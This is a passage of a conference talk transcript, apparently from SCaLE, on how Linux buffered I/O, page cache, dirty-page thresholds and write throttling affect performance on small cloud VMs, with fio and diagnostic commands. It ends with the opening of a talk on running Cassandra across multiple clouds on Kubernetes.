it automatically also means you have less memory. Which is really interesting, because these machines come with a limit on the amount of I/O they can perform. And that is a really interesting topic which I think has a really important relation to this presentation, which is on one hand a bit philosophical, but on the other hand really important to understand. Think about this. When I started doing database technologies, disks were the thing you absolutely had to look at, and you had to understand that a disk rotates at a certain speed, and because of this rotational speed, it could give you data at a certain rate. So the rotating disks were absolutely a bottleneck. And if you think about where this is going with cloud, please bear with me, because I think this is really important if you want to understand and learn about disk I/O performance and cloud. So we have these rotating disks, and they have a certain limit on how much bandwidth and how many I/Os per second they can give you. Luckily, in the 90s came RAID. And with RAID sets, you could use multiple disks as one logical disk, which meant you could use more bandwidth. The latency didn't go lower, but you could use more bandwidth from the disks. When that started to happen, at the same time network-attached storage and storage area networks came into place. And with these, you had specialized appliances running I/O for you, which meant they could produce an even bigger amount of I/Os, because they could host more disks than your server would probably have been able to host. And especially the SANs, and the NASes too, would have had caches, which meant they could actually lower latency. That was all great. And then came SSDs.
And SSDs were fantastic, because SSDs were disks which didn't have any rotating parts, which could sit in your own server, and in your server they could provide you really low latency. Then came NVMe access to the disks, which meant you could use a lot more bandwidth, essentially limited only by the system bus of your computer. So you had huge bandwidth and very low latency. And then came cloud. And with cloud, if you take such a small machine, as I talked about earlier, that machine is automatically bound to a certain number of I/Os and a certain amount of bandwidth that you can use. And if you look at the bandwidth and the number of I/Os per second that you can do in a virtual machine, essentially I see the same limits as with a disk which I first saw in the 1990s. That's mind-blowing, and weird. What does this have to do with this presentation? Well, first of all, it's important to realize that disk is actually, again, a bottleneck, especially if you use smaller cloud VMs, and using smaller cloud VMs is what you probably want to do in the cloud to reduce cost. So now, going back: if you're doing I/O, the I/O you're doing is probably buffered. And buffered means that if you're performing an I/O, the stuff you obtain is stored in the memory of your Linux server, and if you request it again, it comes from memory. There is another option, which is called direct I/O, which can be set using a specific open flag (O_DIRECT). That is possible; it will completely bypass the cache. And that has the advantage that you don't store this data in two places, because if you want to get it in user space, in your application, or for your database in your database cache, then it doesn't make sense to also store it in the operating system. A lot of databases use direct I/O, but Postgres doesn't use it. Postgres, still today (I'm not sure if that's going to change), explicitly asks you to set a reasonably small amount for its own cache and to use the operating system caching. Now, if you have nothing to do with a database, but just want to understand how your application uses I/O, and you're not sure whether you're using direct I/O or not: you're probably using buffered I/O. You can use lsof as a utility to see what your open flags are, but you're probably using buffered I/O. So, where does buffered I/O go? Well, somewhere on your Linux system, obviously. Linux does not have a true dedicated cache for these blocks. Traditional Unixes like IBM AIX and HP-UX did have a dedicated cache, a shielded area where this would go. Linux doesn't have that. And there is another interesting topic: if you're doing buffered I/O, which is probably most if not all of your I/O, then it must be stored as a cached block on your server. Even if you're completely running low on memory, it must be stored as a cached block at one point, even if it is flushed immediately. Writes are different; writes are special, and I will get to that. The important part is this (and because I've done Oracle for a long time, and for Oracle you should set direct I/O): when I started looking into buffered I/O, I realized that buffered I/O competes equally with applications just trying to take memory for the purpose of growing their heap, for performing their work. They compete evenly, which is really interesting to think about. And I know numerous cases where people... in this case, again, Oracle, but I've done Oracle for 25 years.
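(A sketch of the lsof check he mentions, plus a direct-I/O comparison with dd; the PID and file path are placeholders:)

    # +fg prints per-descriptor open flags; O_DIRECT shows up as DIR in the FILE-FLAG column
    lsof +fg -p <pid>

    # for comparison: dd can bypass the page cache entirely with direct I/O
    dd if=/path/to/datafile of=/dev/null bs=1M iflag=direct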
So I have a lot of experience and references there. I know a lot of people doing Oracle who very carefully crafted all their memory areas. Very carefully, because databases are really sensitive to memory, and especially to a shortage of memory. And they would work, and then all of a sudden they would find that their system had swapped, which they totally didn't expect. And I, for a long time, didn't understand it, but it wasn't a problem, because the system wasn't actually swapping; swap was just taken. And now that I've investigated buffered I/O, in hindsight I realize what happened. The backup is done, and the backup is probably done buffered, which means it competes with normal applications and therefore pushes out certain pages which have a really low touch count. The Linux buffer cache keeps a touch count of all the buffers, and it will push out the ones with the lowest touch count if you're running low on memory, and push those to swap. But if that is, say, a page which contains the executable code that's only used for starting up your application, that page will never be used again, so it's not a problem. So that is another point: if you have swapped some stuff out, and you're not actively swapping in and out, it's not a problem. And I've seen a lot of tickets where people try to claw back their swap, because that was supposedly how it should be. Don't; that's not necessary. Okay, so where does buffered I/O go? I haven't said anything about that yet. Well, Linux provides an insight into how memory is divided in /proc/meminfo. And "messy" sounds a bit negative on the slide; I say it's a messy gathering of statistics, but it's actually just a whole bunch of statistics, and some of the statistics contain figures which are also doubled up in other statistics, and some statistics aren't kilobytes but pages, for example for huge pages. But very roughly, if you look at the statistics Cached, Dirty and Mapped, these are roughly that: the cache of these blocks. That's not really precise, what I'm saying; I know. What I'm trying to say is that it probably isn't useful or handy to try to figure out exactly how many of these pages you're caching. It fluctuates all the time. But you have to have memory available for buffered usage, and actually the best indicator, which is surprisingly little talked about (I cannot find a lot of references to it), the best way to assess whether you have enough memory, is the statistic MemAvailable. I've forgotten the exact kernel version it appeared in, but MemAvailable is not a really ancient statistic. MemAvailable is what is actually, potentially, available at the point in time that you are querying /proc/meminfo. One of the things I get asked quite frequently is: what about MemFree? Well, MemFree is not free as in available. MemFree is actually a small amount of memory which Linux tries to keep free for the purpose of very quickly handing out freed memory. Linux, and this is a really important rule, like probably most operating systems, tries to do as little as possible. So if you're dirtying, if you push in data, it will just be there. It will not be freed, except for a bare minimum, which is MemFree. So it has nothing to do with memory being available; it's a tiny part of memory which is explicitly kept free for the sake of providing memory pages to a Linux process which requires free memory.
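(The statistics he's talking about all live in /proc/meminfo; a quick way to watch the relevant ones:)

    # MemAvailable is the one to watch; MemFree is not "free as in available"
    grep -E '^(MemTotal|MemFree|MemAvailable|Cached|Dirty):' /proc/meminfo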
Of course, just after startup there is a lot of free memory, because you haven't touched all this memory, so it's by definition actually free. But like I said, if you start doing stuff, it will just put stuff in all these buffers, and it will not do anything with it unless it absolutely has to. If you actually need to make memory free, you're using the swapper. And at Yugabyte we use virtual machines with no swap allocated, which I had hard feelings about at first, but it actually works rather well. And what you sometimes see on a system with no swap allocated is that the swapper thread of the Linux kernel gets active, which seems really weird, because we don't have any swap. Well, "the swapper" is actually not really good naming in Linux. The swapper is actually the page daemon, and it's the swapper that frees memory if a process actually needs it. And I've got a link (this presentation will be made available), I've got a link that tells a lot more about it. So, MemAvailable: it's the kernel's estimate of memory that is available right now, without requiring swapping. So why would this be important? Well, buffered I/O can do miracles for performance, and equally it can do miracles for applications which need to do I/O. So let's test this. Let's actually just see how this works, and I provide really simple command lines. Test it for yourself: if you're having doubts, do the actual good thing and test it for yourself, because everyone uses memory and I/O in a different way. I'm doing it on an Amazon EC2 machine of the shape c5.large, and I've got these weird numbers here. Oh, you don't see my pointer. I've got these numbers there which say: c5.large VM, 20,000 / 4,000 IOPS. The first number is the bursting number and the second number is the base number, and that also goes for the megabytes per second. How does that work? If you have a small machine, then in a lot of cases you're allowed to run with bigger limits for a small amount of time (it's specified in the documentation how much), which is called bursting. If you're using a virtual machine professionally, you should not rely on bursting. It can absolutely drive you nuts: you're doing something at a good rate, and then, for reasons unknown to you, the Amazon platform reduces it. You can't see it; Linux doesn't give any indication. It just magically gets lower. Your bursting credits, I should say (Amazon works on a credit system), go lower. Do not rely on it, because it is impossible to understand without looking at the Amazon side and seeing that you've gone through your credits. And the same applies to what I call EBS, Elastic Block Store: those have limits too. So you have to combine these limits, and obviously the lowest of the two is what applies. In my tests, I'm not running into my bursting limits, so the lowest applies: I can do 3,000 I/Os per second and 125 megabytes per second. Those are my actual limits. There is a page; even if you know what you're looking for, I think it's hard to find that page, but it's really important to understand the limits, so you can use this link to see your EC2 limits, especially if you see weird things. And now that I say this, you think: hey, maybe that's it. So I have a c5.large; it's a four-gig machine, and what I'm going to do is use fio, and I'm reading two gigabytes in this way. The switches are all there. A word about fio: fio is a brilliant tool.
You can do anything with fio, but in its brilliance it has so many options, and so many options have been thought through so thoroughly, that it is sometimes really strict in what it's doing, which means it might not actually be doing what you think it's doing. And one of the things for which this is true is a switch you might not have seen a lot, which is --invalidate=0. --invalidate=0 means: do not wipe the page cache before running. Because I want to run this two times, and I want to show the advantage of using the cache, it would not be helpful if fio wiped the cache before the second run, because then I would be doing exactly the same thing again, right? If you're doing things with fio: validate, cross-check, that fio actually does what you think it is doing. It's really important to do that. I find that when I want to look into specific behavior, it might not do what I think it's doing. So this is how it looks, and I hope the video is big enough, and... yeah, it is doing stuff. This is a utility, and I'm afraid I cannot enlarge it because it's a video. I wrote a small utility in Rust to show the memory sizes, and I will show the end output in a bigger font later on. So essentially I'm running stuff: I'm looking at this, and then I'm pasting the fio command, and by pasting it, it starts reading data, and then it produces the output. And this is the highlight: I'm doing 2,609 I/Os per second, which is 21 megabytes per second. My limits are higher, so why can I not reach the limits here? Is Amazon lying about its limits? No, it's the latency. The latency is really good: it's 0.3 milliseconds per I/O. But I still need to do them, and these are all sequential, and I'm reading the data for the first time, so it's not in my cache yet. So I'm still bound by the latency, despite the fact that my latency is really low. This is really great, but still: I'm bound by the latency of doing I/O; I do not hit the limits of the device. Now, if I perform the exact same run again... well, this is me doing it, but it returned immediately, and these are the figures. My I/Os per second, doing it a second time with the --invalidate=0 switch so I can actually take advantage of my cache: I'm doing 580,000 I/Os per second, at a rate of 4.5 gigabytes per second. I promised you it can have magical results; I think these are magical results. The first time was okay (well, actually really good for doing physical I/O), and the second one is marvelous. This is what you want to see. The reason for it is kind of obvious: I haven't actually done any physical I/O at all, and fio does show this with the "ios" line. It didn't do any physical I/O; it just read it from memory. Now, how about four gigs? And mind you, my system is approximately four gigs in size. So I'm doing the exact same thing; the only thing I changed is setting it to four gig. I'm looking at the same stats again. So the summary of the run: this first run is just like the other first run. I'm bound by the latency of doing the I/Os, which are really fast, but you still need to read the data. So the rate is identical to the two-gig run. Now let's perform the exact same run again. Look at the option --norandommap. fio is really smart. At first I tried just running it again, but with fio, if you're doing random I/O, the I/Os are truly randomized; however, it keeps a map in memory, and it very explicitly touches every single block truly only once.
It takes each block truly only once for reading, which is not "random" by my definition, because an application firing random I/Os would touch some blocks multiple times. You can get that behavior by setting the --norandommap flag. Again, what I said: fio is so smart and well thought through that if you want certain behavior, please validate that it actually does what you think it's doing. So it is random, but only random in choosing the order of the blocks, not random in the sense of choosing blocks multiple times. I was very surprised to learn that. And if I don't set this flag and just touch every block once, and I've got less memory than the file, the cache cannot keep it, and it will actually push through all the I/Os, so I will not get any caching effect at all. And that is more or less what happens in this run: I'm doing loads of I/Os, because the file I'm trying to read is bigger than memory, so I cannot cache the entire file. And just because I touch some blocks multiple times, I do get some caching effect, but the caching effect here is way less. I'm doing 4,200 I/Os per second, which is what I'm bound by, and that is because I simply touch some blocks multiple times, but most of them still need to be read. But the question is: I've now done some tests, but are these tests actually reality? Most of the time, if you're doing stuff with I/O, you have an application which drives it, and this application will likely use the data you're doing I/O on, and will keep memory allocated for the sake of running the application. So what if I do the same tests, but occupy 50% of the memory? Well, this utility I wrote, which I actually borrowed from a C program at this URL and reprogrammed in Rust, takes 50% of memory, and touches the memory so it's actually allocated. So by taking 50%, I map 50% of the memory so it's not available anymore. And then I redo the same tests. What is happening? This... I have no idea what happened. So, this is running the utility. The first run is identical to the one without memory taken, because it just reads the blocks; it's bound by the latency, and the latency doesn't change. So it's generally equal. And if I do it again (because I have less memory in my server, here, with two gig, I already have to add --norandommap), well, this is too small to be visible, sorry about that: I cannot get the same figures as I had previously. I think by now this is really obvious, but now think about a scenario where you have an application, or a database; I think it's quite common to have a database in an application stack. You just start up the database, nothing is actually allocated yet, and you run a test, and the test can take advantage of the caching, and you say everything is good. Then a year later, or whatever the timeline of the project is, the whole application is done, you hook up all your connections to the database, the database is actually being used, and you're doing exactly the same thing, and then the performance is totally different. This is what I tried showing here, and this is actually a real-life situation which I've seen an enormous amount: people tested, probably without realizing it, in an absolutely ideal situation, and then in reality, when memory is actually taken and stuff is actually running, performance is drastically lower, and nobody understands why it's slow, because "we tested it."
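(His exact fio switches are hard to read on the recording; reconstructed under assumptions (the file path, 8k block size, and psync engine are mine), the two read tests look roughly like this:)

    # buffered sequential read, keeping the page cache between runs
    fio --name=bufread --filename=/data/testfile --size=2g --rw=read \
        --bs=8k --ioengine=psync --invalidate=0

    # random read over a 4g file, allowing blocks to be hit more than once
    fio --name=randread --filename=/data/testfile --size=4g --rw=randread \
        --bs=8k --ioengine=psync --invalidate=0 --norandommap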
Well, this is the reason you have to understand your memory footprint and the actual amount of I/O that you're doing, and you can see it here too. I'm doing the two gig, and fio shows me that I've performed a lot of I/Os; you see the "ios" figure there on the bottom line. Now let's look at writes. Here I start, again, with an idle machine, I write something, and this is the summary of the run: my I/Os per second. For writes, obviously, I do not have to do two runs. For writes, I just perform the writes and it's done. And writes are special. I said it at the beginning, and why are writes special? If you're writing on Linux, any buffered write is not done to disk. A lot of people think it's done to disk; it isn't. You're writing into memory, and then the kernel will decide, at a certain point in time, to write the blocks you've dirtied to disk. And that's a really interesting concept, and it's not obvious, because normal human thinking is that if I'm writing, I'm writing to disk immediately, but that's not what happens. Another thing... sorry, yes? Yes, yes: the remark is that even when it is written, the disk controller will cache it. Yes, absolutely. I don't want to go down to that level, because the amount of stuff in Linux alone is already a lot. Writes are special. The first thing which is really special in Linux with writes, which you have to realize (because then it all becomes a lot more logical), is this: if you read something, and the memory is needed, that read can be discarded immediately. Nothing is harmed by discarding that block, and it can be reused. But if you've written something and you've got a dirty block, the kernel has no option other than to write it. It will not even put it to swap; it will write it to disk, and it must do so, because if it doesn't, it will corrupt the filesystem. And that is what I meant by "writes are special." Therefore, the limits for writes are way lower. The amount of writing you can do is limited, because you cannot swamp your memory with writes; then your system would be stuck with dirty blocks, and you can probably write to memory faster than you can write to disk, right? That's the whole purpose of buffering them in the first place. So there are kernel parameters for this, which are vm.dirty_background_ratio and vm.dirty_ratio. And here is a thing which is really not well documented: a lot of people think these ratios are taken from the total amount of memory. That is not true. I think it's even documented that way in places; I'm not sure if it's in the kernel documentation, but there are a lot of blogs describing these ratios as being over total memory. These ratios are over available memory, which means that if you take an application and start allocating memory, the available memory obviously lowers, because you've taken memory and used it for a certain purpose. So as available memory lowers, your dirty_background_ratio and dirty_ratio thresholds, in absolute terms, automatically lower too. And that is really important to understand, because it means that a write which could be buffered comfortably at one point in time, if your application is really hungry for memory and takes a lot of it, at another point in time your threshold for needing to flush those dirty pages might be way lower.
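(The knobs in question, and where to watch the dirty page count:)

    # thresholds: percentages of *available* memory, as he points out
    sysctl vm.dirty_background_ratio vm.dirty_ratio

    # how much is dirty and being written back right now
    grep -E '^(Dirty|Writeback):' /proc/meminfo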
And what the kernel actually does is this: if the kernel finds that you're swamping the memory with dirty pages, based on these ratios, then when you perform a write system call, the kernel, inside the write call, will evaluate the number of dirty pages and just put in a sleep. This is really what it does; it's called balancing. It will put a sleep in the write call and put your process or thread in a sleep state. It will truly just schedule it off-CPU for a certain amount of time, in order to push back on the writes, to try to balance it. And it's actually called balancing. And I've got a link here, too, to a blog post I wrote about it, where I go to the exact lines in the kernel where this happens. And it's actually good to go to the kernel code even if you can't read C, because there is a lot of explanation about these ratios in the C code of the kernel. So: I'm writing, and I'm writing 500 megabytes, and this is the summary of it. I'm doing 500 megabytes on this system and I get really great figures: 193,000 I/Os per second, and 1.5 gig per second. And why am I getting these really good figures? Well, I've got a system where no applications have taken a lot of memory, and therefore this write of 500 megabytes didn't actually produce any I/Os while it was running, because I was below the limit. That is what's on the lowest line: my available memory is three gig, and the ratio works out to 922 megabytes. So the 500 megabytes I'm trying to write fits in memory as dirty pages. Brilliant. Now let's look at reality again, and I think you understand what the "reality" step here is doing. If I take 50% of memory, then my available memory will lower, obviously, and therefore my threshold will be lower. And if I produce the same write of 500 megabytes and do it again, in pretty much the same way as my reads, now all of a sudden this write will be way slower. And that's not because the system has magically become slower. No, there is a very good explanation: we've taken a lot of memory, we have way less cache, and the kernel does exactly what I described. If you cross a certain threshold, it determines that you're trying to flood the system with dirty pages, so it starts throttling your write calls in order to balance the memory. And, well, this is all of that happening. And for the two-gig write, I don't think I can add a lot if you understand that these limits get lower: with two gig, the first run already goes over the limit, so with 50% of memory taken it will also go over it. So what am I saying? If you have a system running in Kubernetes, in a pod, which probably has a certain amount of memory, and you rely on I/O performance at a certain rate, and you know you're doing buffered I/O: do you keep track of available memory, and do you understand whether what you're trying to do fits with how your memory is sized? Do you know that? Because I don't know a lot of people who are actively keeping track of available memory, while, if you're relying on performance, this should be the parameter to look at, because it is what is most telling about what is available for this caching. And do you understand the amount of reads and writes that you're doing? That is a really tricky one, and in my past as an Oracle database administrator I saw it a lot, too.
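(The 500-megabyte write run, reconstructed under the same assumed switches as the read tests:)

    # buffered write: completes at memory speed as long as it fits under the dirty threshold
    fio --name=bufwrite --filename=/data/writefile --size=500m --rw=write \
        --bs=8k --ioengine=psync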
If you're using a certain number of pages now, it doesn't mean you will be doing exactly the same a few months or a year further on. If you have a successful application, there will probably be more users and more data, so maybe you're doing more I/Os. So even if the application absolutely didn't change, even if everything stayed the same, you could still hit a limit, simply because you're using more data and your memory amount is fixed. So you hit the threshold, and your fast I/Os from cache cannot work anymore, because you're requesting more I/O. And it's important to understand the differences between reads and writes. And this is the active data set; that's what I just talked about: do you understand how much data you're requesting all the time, and do you know whether it grows or not? Well, I said this at the beginning, and this is actually my last slide, so after this I'm open for questions or any remarks. The tests I did were performed on a system with no swap device; that is how we do it, and for simplicity of understanding. If you have a memory shortage... I was kind of surprised at first, but it's actually refreshing, because you do not have to swap. I see swap as kind of a cushion for falling. If you have too little memory, you have a problem, period; or, let me put it more friendly, your performance will be influenced. If you do not have swap, you will hit kind of a wall, because your memory is limited. If you have swap, you will be hitting the wall too; no question about that. If you're running out of memory, you're running out of memory, period. But you could argue that it is a little less painful, within certain limits. So I'm not advocating totally against swap, but I'm also not advocating for having it all the time. You have to think about whether it makes sense, and whether you want the complication, especially if performance is critical. And then the last remark: Linux ages buffers based upon an LRU mechanism, least recently used. So if things are swapped out, they haven't been used in a long time; well, it's based upon the LRU state of all the pages, obviously. If you swap out some stuff, it means you were demanding memory which you didn't have; that is the reason it swapped in the first place. But it's not really a problem to have some swap in use, because the Linux kernel will try to do as little as possible: if it has swapped out pages and you're not requesting them, they will just sit there, swapped out, for as long as the application they came from is still active, and it's not a problem. A lot of people think it's a problem; it's not a problem. So that is the end of my presentation; hopefully you've enjoyed it, and it gave you a lot to think about. I will repeat the question. The question is: how does the write throttling work? The really short version: the write throttling essentially just tries to add time, to prevent the system from getting swamped with dirty pages, like I explained. So it will do a little, and I think it can go up to two seconds or something like that, but you have to read the source code; if you go to the link, you can see it. It's really interesting. There is perf: you can set a perf probe on the kernel... how is it called?
It's called a probe, on the kernel function which executes this, which will then tell you whether it did the throttling, and for how long. So that is how you can see it. But there is no... and that is really weird; to my mind, Oracle is really well instrumented, and here there is no other indicator that this is happening. That is the reason why it was kind of surprising to me that this happens in the first place: there is no statistic that will tell you it happened. I will get... I think... yes. Well, the thing that happens in the write call is actually Linux scheduling the process off-CPU for a certain amount of time. No, that is... sorry, no, sorry: iostat shows the block device statistics, so that has nothing to do with this. iostat will show you how the system communicated with the disks, not how the process performed the write. So yeah, it's really close, but they're really two different layers. /proc... so the Linux kernel has statistics, and that's /proc... oh, PSI. So the question is: the Linux kernel has PSI, and does Pressure Stall Information give more, or more useful, information than /proc/meminfo? I think they serve two different purposes. /proc/meminfo gives you a lot of details, but it really doesn't tell you anything about performance; and Pressure Stall Information is all about: if I'm executing I/O, what is the impact on running? Because that is what I think the stall information is showing you. So in my mind they show you two different sides of doing I/O. Or, well, actually /proc/meminfo doesn't say anything about I/O, just how memory is divided between all the pages, in a lot of detail, and PSI will tell you the other part. But I haven't looked too deeply at PSI, because it is a fairly recent feature. There hasn't been a lot... well, there are enough blog posts about it, but not an awful lot, and I haven't seen a lot of people actually using it. That is what I've seen, which is a shame, because I think it's really interesting, and if you have the opportunity to enable it, I would certainly do it, to see if you can make sense of it, because it gives you information based on the perspective of the process running the I/O, instead of just figures for an amount of I/O that you're doing. So it's a really good thing to mention, but sadly I haven't got a lot of experience with it. Okay, I think I understand your question. Your question is: okay, you've talked about all this, but what should I do now with this information? So the question is, well, I think this question still stands: you've told me a lot of details about how this works, but what should I do? What can I do with it in a practical way? Well, a lot of these details would mean... You talked about the examples with 50%. So does the swapper process get running at the point that both of those examples, read and write, happen, when you don't have swap available, a swap file or whatever you use, a swap space? So could you see that process running at those times? I'll try. So your question is: if the problem happens, what can I see? What I was going to say, which I think, like you said, is quite closely related to your question, is: what can you do? Well, if you want to get down to the bottom of it, it will cost you time, and you need to build up some experience, and if you have a whole farm of servers, you probably do not have this time. Well: get a lot of the details, and just collect them.
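(Concretely, two ways to see this machinery yourself. As far as I can tell, the function he and his blog post point at is balance_dirty_pages in mm/page-writeback.c; treat that name as my reading of his reference, and note that perf probe needs kprobes and kernel debug symbols. PSI lives under /proc/pressure on kernels 4.20+, possibly requiring psi=1 on the kernel command line:)

    # dynamic probe on the write-throttling function
    perf probe --add balance_dirty_pages
    perf record -e probe:balance_dirty_pages -aR sleep 60
    perf script

    # pressure stall information for I/O: time tasks spent stalled on I/O
    cat /proc/pressure/io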
Prometheus will collect them for you, so you can research and go back to these details over time, because that is a thing which Linux itself doesn't provide to you. But with Prometheus, for example, or with a lot of other tools, you can get the statistics back in time, so you can figure it out if you're running into a problem. One of the things which I think is really important to understand is: you need free memory. If you have an application doing buffered I/O, you need free memory, which, from the perspective of someone trying to size a system, looks like memory doing nothing. You need that free memory for the sake of this caching, and this is what I see being left out all the time. People will carefully size things up, saying: I have an application which takes so much memory, and I take so much for the operating system, so this is the amount of memory I need. And what I'm telling you is: if you're actually using all of that memory, then there is nothing left for performing this buffering, so your I/O will fluctuate all the time. It will be good one time and then be absolutely crap the second time, and it's kind of hard to figure out why. Yeah, well, the first realization is that you have to understand that you have to size in extra memory, which from the perspective of sizing memory is memory doing nothing, but you actually need it. Exactly. We have time for one more question, and over here; I saw a hand over here. So, you've switched between two things. One, in my mind, is that you have an Oracle database that pretty much owns the machine, in certain cases; but then you also talk about Kubernetes, where my pod that is doing reads and writes is fighting with other pods that are all using the combined resources of the machine. So my pod, though it could be memory-limited, the caching and the read/write layer is really being shared by all the other pods. So how do I determine what my pod needs? Because I don't know what the other pod owners are doing with their pods. Once again: I understand that if you had an application that owned the box, you could make these calculations, but once you say Kubernetes pod, you're fighting with other people.
That's a very good remark, and this is something which I generally find lacking in a lot of talk about Kubernetes. Because indeed: you have a single physical box, and you run multiple pods, multiple machines which do not see each other, which all try to use the shared resources of that same machine. And I think this is an aspect of running Kubernetes which is greatly underappreciated and under-examined. Because, and this is an opinion, I'm not saying it must be so, simplistically thinking: if you have resources, and you know the amount of resources, you should divide them. For CPU, I know you can do that; you can already divide it, so you have a fixed amount of CPU. Memory is also divided per pod, as far as I know, so you can do that, and figure out whether you have enough memory. But then, indeed, your physical I/O devices are shared. And actually, in my opinion, your physical I/O should also be fixed per pod, so that you can carefully carve it out and say: I've got 3,000 I/Os. Especially in the cloud, with a lot of these machines, you know the number of I/Os per second and the bandwidth that you have, so you could say: I want 20% of this I/O to be dedicated to this specific pod which is running here. So this is a resource which needs to be there if this pod is running on this physical machine. But that is an opinion I have. The point is: if you don't do that, then exactly what you say happens, and again, this is what I see as a big problem: your throughput and your latency will come across as very random, because at one point in time you can do a certain number of I/Os, and twenty minutes later you can't, because you have a few other pods also trying to share the same resource, and therefore you get a lower amount. And this is a big problem if you're trying to do quality of service and say: I want to make sure that it's running at a certain rate. Absolutely, I think that is a missing part. So yeah, I wholeheartedly agree with what you say. Absolutely true. Thank you so much for fielding all these questions, Frits. Really awesome talk. Please feel free to continue the conversation; I'm sure Frits is happy to catch you later, or outside. We will be back in about five minutes, at 16:30, 4:30 p.m., for delving into more cloud-native, database-related concepts. All right. Good afternoon, everybody. Come on in, settle down. I'm excited to introduce Raghavan Srinivas, who is here to share about Cassandra running on Kubernetes, and just a little bit more of a deep dive on databases that are cloud native. So please give him a hand and welcome him to SCaLE. Thanks for being here. Thank you, Geneva. Glad to be here, but it's always kind of dicey to be the last session. Oh, there's one more, I guess, after this, right? So I guess I'm okay. In terms of history: I've submitted several times to SCaLE, but this is the first time I'm speaking at SCaLE. Really excited. How many of you have already attended multiple SCaLEs? Looks like all old-timers. But treat me gently. In any case, I'm here to talk about Cassandra running on Kubernetes, and multi-cloud Kubernetes, so a lot of different topics coming together. It has a little bit of a story, because it started at KubeCon NA, actually, in LA, about a year back, October, when I did a multi-cloud, or a multi-region actually, Cassandra on GKE, because GKE networking is probably the easiest among all the other clouds, right?
But fast-forward through re:Invent and KubeCon EU and all that: now I'm in a position where I've been able to install a multi-cloud Cassandra, and you will see that in action today, in a lot of demos, okay? A multi-cloud Cassandra running on GKE and EKS, which is installed from AKS, okay? So I think it's pretty cool. You'll see that it took me a few months to actually make that happen, and I think it'll be even more exciting now that Satya Nadella and Larry Ellison are talking about multi-cloud, right? So everybody is talking about multi-cloud, but my question to the audience is: how many of you are already doing multi-cloud? A few people. And I know multi-cloud has different connotations, right? You know, if I use different clouds, that could count as multi-cloud, but in this context it really means my application is spread across different clouds. So with this new definition, where my application is running on multiple clouds at the same time, how many of you are doing multi-cloud? A few, okay. And all of you... I mean, I assume the three of you are using Kubernetes, or something else, or... kind of? Yeah, yeah, okay. Okay, so let's talk about this, and we'll see where it takes us, okay? Oh, by the way, my name is Raghavan Srinivas. I work as a developer advocate for DataStax. You know, I was a mechanical engineer, but since then I've done a lot of distributed systems and middleware. One of the things I like is to see code in action, and that's why I'm gonna do a lot of demos today. And I have a colleague of mine, Matt Overstreet, who is much smarter than me, so I'll delegate all questions to him, right? But again, feel free to talk to us if you have any questions about Cassandra. He did a great talk; I recommend you go take a look at that as well. You know, he talked more from an application-patterns perspective rather than from any infrastructure perspective. I myself live at kind of the confluence of both infrastructure and applications. I just want things to work. I come from a Cloud Foundry background; you know, I just want things to work. I don't know if you guys have heard of the famous cf push, and everything is stood up: I don't know anything about where it is deployed, how it is deployed, what are the things that make it happen. It just happens, right? So I'm also a big fan of kind of the inner loop. The inner loop is when you have a kind of lightweight CI/CD cycle; you know, some of you have used Skaffold, Jib, and those kinds of tools. It makes it a lot easier for somebody who's an application developer on Kubernetes to be able to do these mundane tasks over and over again, like maybe 100, 200 times a day. With that said, how many of you were able to attend Kat Cosgrove's talk this morning about Kubernetes? Yeah, that was a great talk as well. So I recommend... you know, if you're new to Kubernetes... how many of you are new to Kubernetes? I mean, like, really new? Okay. That's about half; that's kind of what I expected as well. I would strongly recommend you attend that... I mean, not attend the talk, because it's already done, but take a look at it, or, if you have a chance, kind of see her at some point. We have a great crew behind us. We do workshops every week. They're all free to attend. We have a tier which makes it possible for you to actually run some fairly sophisticated production workloads, and you get a $25 per... credit.
I mean, a $25-per-month credit, without even having to put in a credit card or anything like that. The main goal of our DataStax developer crew is to up-level, you know, your learning, or your experience, or whatever the case may be. And I myself have learned a lot in those workshops. It happens every Wednesday at 11 o'clock, 11 Eastern (I need to be specific about that), which is a little bit early for Pacific, but we try to cater to a worldwide audience. We get anywhere between 200 and 800 people. So feel free to attend that if you want some more basic information, because today I'm gonna be going into some more advanced topics, okay? But even though I'm gonna be doing a lot of advanced topics... and by the way, I've been criticized for being a little too loud, okay? Which, you can see, comes from excitement, okay? So if I'm too loud, you know, just let me know. I will pipe down, okay? I'll try to, anyway. So the agenda for today: just do a quick intro, which I already did, right? And then, for those of you who have never heard of NoSQL or Cassandra, a very quick intro to NoSQL and Cassandra, and then a little bit about K8ssandra, which is a play on the Cassandra and Kubernetes names, right? And I think it's a pretty cool name. It's Cassandra running on Kubernetes. And then, of course, the multi-cluster, multi-cloud part, using the K8ssandra operator, which was introduced very recently. So when I started my GKE adventure, there was no such thing as a K8ssandra operator. There really wasn't. So I had to do things manually. But now I don't need to anymore, and I'll show you how we can do that. You know, it uses... and maybe I'm giving away everything right now, but basically what Cassandra uses is something called a gossip protocol. And as long as one node, from a Cassandra perspective, can talk to another node (you enable the networking to make that happen), then essentially it can form a larger cluster on its own. And that is really all that I'm gonna show today, okay? It basically doesn't matter whether it's multi-cluster, multi-region, or multi-cloud: it works exactly the same. And the gossip protocol is pretty cool, because it's not just kind of a heartbeat kind of thing. It actually exchanges more information, to the level that each node has an idea of what the other nodes are doing at any point in time. And not too much information; it's not too chatty, but at the same time it's not just really basic information. And as long as you enable the networking, you can make it happen. And you will see one or two instances of that. I won't go into my first adventure, which was with GKE, but I'll go into EKS, where I used something called KubeFed. Unfortunately, KubeFed is... anybody using KubeFed, by the way? I'd like to talk to... yeah, I don't see any hands at all, unfortunately, but KubeFed is a great project, and I'll talk about that. And then I'll do some demos, and then finally, kind of point you at some resources, and hopefully we can get out of here well before half past five, okay? All right. So, no big deal: NoSQL was... somebody came up with this catchy hashtag, but I was corrected that somebody had actually already invented the term. I think it got popularized a little bit more by this meetup on June 11th, 2009, roughly 13 years ago, okay? So really, if you think about Cassandra, NoSQL and all that, it's not fundamentally new. It definitely isn't. But if you think about the cloud and NoSQL, there are a lot of commonalities, okay?
